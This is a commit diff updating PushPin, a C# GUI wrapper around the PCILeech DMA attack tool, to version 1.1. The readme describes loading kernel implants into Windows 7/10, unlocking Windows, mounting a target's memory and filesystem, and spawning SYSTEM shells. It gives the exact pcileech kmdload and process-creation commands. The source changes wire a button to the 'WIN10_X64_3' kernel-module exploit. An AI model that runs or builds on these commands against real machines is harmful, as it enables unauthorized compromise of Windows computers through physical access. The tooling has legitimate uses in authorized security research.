Version 1.1 update

readme.md

@@ -11,7 +11,7 @@ If you're not sure what PCILeech is please read up on the project first. https:/
 
 The GUI workflow is similar to the PCILeech CLI, first successfully load a KMD (KMD LOADERS) and then use the KMD address to load Kernel-mode implants (ACCESS). The following PCILeech kmdload, commands and Kernel-mode implants specfic to Windows Operating Systems are included. 
 
-* Load a kernel module into Windows7x64 or Windows 10x64  
+* Load a kernel module into Windows 7 or Windows 10 64-bit operating system  
 * Unlock Windows 
 * Mount the targets filesystem and memory
 * SYSTEM or USER command shell
@@ -20,13 +20,16 @@ The GUI workflow is similar to the PCILeech CLI, first successfully load a KMD (
 ### PushPin GUI overview
 ![](pushpin_description.PNG) 
 
+### KMD Loader Update
+Please use WIN10_X64_3 and then WIN10_X64 if it fails. WIN10_X64_3 is currently stable accross versions of Windows 10 including Windows 10 2004 release. 
+
 ### Logging
 PushPin provides a minimal level of logging of actions taken while using the GUI. The PushPinLog.txt log file is created or appended when an action is taken.
 
 ## System Requirements
-Please ensure [PCILeech Version 4.6](https://github.com/ufrisk/pcileech) functions correctly with the commands listed above. 
+Tested with [PCILeech Version 4.7](https://github.com/ufrisk/pcileech) and functions correctly with the commands listed above. You can download PCILeech precompiled binarys [here](https://github.com/ufrisk/pcileech/releases/download/v4.7/PCILeech_files_and_binaries_v4.7-20200907.zip).     
 
-PushPin is developed in C# targeted for .NET Framework 4.5. Compile or use the precompiled PushPin.exe binary and place it into the the same directory as pcileech.exe.
+PushPin is developed in C# targeted for .NET Framework 4.5. Compile or use the precompiled PushPin.exe binary and place it into the the same directory as pcileech.exe. [Download the latest PushPin.exe](https://github.com/LuckyPi/PushPin/releases/latest).
 
 At a miminum your directory should contain:
 ```
@@ -41,6 +44,7 @@ wx64_pscmd_user.ksh
 wx64_pscreate.ksh
 wx64_pslist.ksh
 wx64_unlock.ksh
+win7x64.kmd
 ```
 
 #### <b>The following commands must work in the CLI for the GUI to work</b>
@@ -49,7 +53,7 @@ Load a kernel module into Windows 7x64 or Windows 10x64:
 ``` 
 pcileech kmdload -kmd win7x64
 pcileech kmdload -kmd win10_x64
-pcileech kmdload -kmd win10_x64 -memmap auto 
+pcileech kmdload -kmd win10_x64_3 -memmap auto 
 ```
 *pcileech kmdload -kmd win10_x64 -memmap auto* - integrates with MemProcFS 
 
@@ -79,4 +83,8 @@ pcileech wx64_pscreate -kmd kmdaddress -s c:\windows\system32\spoolsvupdate.exe
 Use at your own risk. This code is provided for educational purposes ONLY. Developers assume no liability and shall not be held responsible for any damage that may result from use or misuse of the provided code. It's the end users responsibility to obey all applicable local, state, federal and country specfic laws.  
 
 ### Changelog
-v1.0 Initial release.
+v1.0 
+ * Initial release.
+
+v1.1
+* Updated to reflect WIN10_X64_3 kernel module

source/Form.cs

@@ -4,7 +4,7 @@
 // Description: PushPin is designed to provide a visual interface wrapper to pcileech
 // PushPin author: JT, [email protected]
 // PCILeech author: Ulf Frisk, [email protected]
-// Dependencies: PCILeech v4.6 - https://github.com/ufrisk and it's dependencies 
+// Dependencies: PCILeech v4.7 - https://github.com/ufrisk and it's dependencies 
 /*******************************************************************************************************************************/
 
 namespace PushPin
@@ -110,9 +110,10 @@ private void Button_win10x64_Click(object sender, EventArgs e)
         }
 
         //
-        // ***  WIN 10x64_2 memmap method KMD EXPLOIT *** //
+        // ***  WIN 10x64_3 memmap method KMD EXPLOIT *** //
+        // WIN10_X64_3 is currently stable accross versions of Windows 10 including Windows 10 2004 release
         //
-        private void Button_win10x64_2_Click(object sender, EventArgs e)
+        private void Button_win10x64_3_Click(object sender, EventArgs e)
         {
             try
             {
@@ -121,7 +122,7 @@ private void Button_win10x64_2_Click(object sender, EventArgs e)
                 start.UseShellExecute = false;
                 start.CreateNoWindow = true;
                 start.RedirectStandardOutput = true;
-                start.Arguments = "kmdload -kmd WIN10_X64_2 -memmap auto ";
+                start.Arguments = "kmdload -kmd WIN10_X64_3 -memmap auto ";
 
                 //
                 // Start the process.
@@ -137,7 +138,7 @@ private void Button_win10x64_2_Click(object sender, EventArgs e)
 
                         textBox_status.Text = result;
 
-                        Class_action.Action = "Win10x64_2 KMD";
+                        Class_action.Action = "Win10x64_3 KMD";
                         Class_status.Status = result;
                     }
                 }

source/Program.cs

@@ -4,7 +4,7 @@
 // Description: PushPin is designed to provide a visual interface wrapper to pcileech
 // PushPin author: JT, [email protected]
 // pcileech author: Ulf Frisk, [email protected]
-// Dependencies: PCILeech v4.6 - https://github.com/ufrisk and it's dependencies 
+// Dependencies: PCILeech v4.7 - https://github.com/ufrisk and it's dependencies 
 /*******************************************************************************************************************************/
 
 namespace PushPin

source/SettingsClass.cs

@@ -4,7 +4,7 @@
 // Description: PushPin is designed to provide a visual interface wrapper to pcileech
 // PushPin author: JT, [email protected]
 // PCILeech author: Ulf Frisk, [email protected]
-// Dependencies: PCILeech v4.6 - https://github.com/ufrisk and it's dependencies
+// Dependencies: PCILeech v4.7 - https://github.com/ufrisk and it's dependencies
 /*******************************************************************************************************************************/
 
 namespace PushPin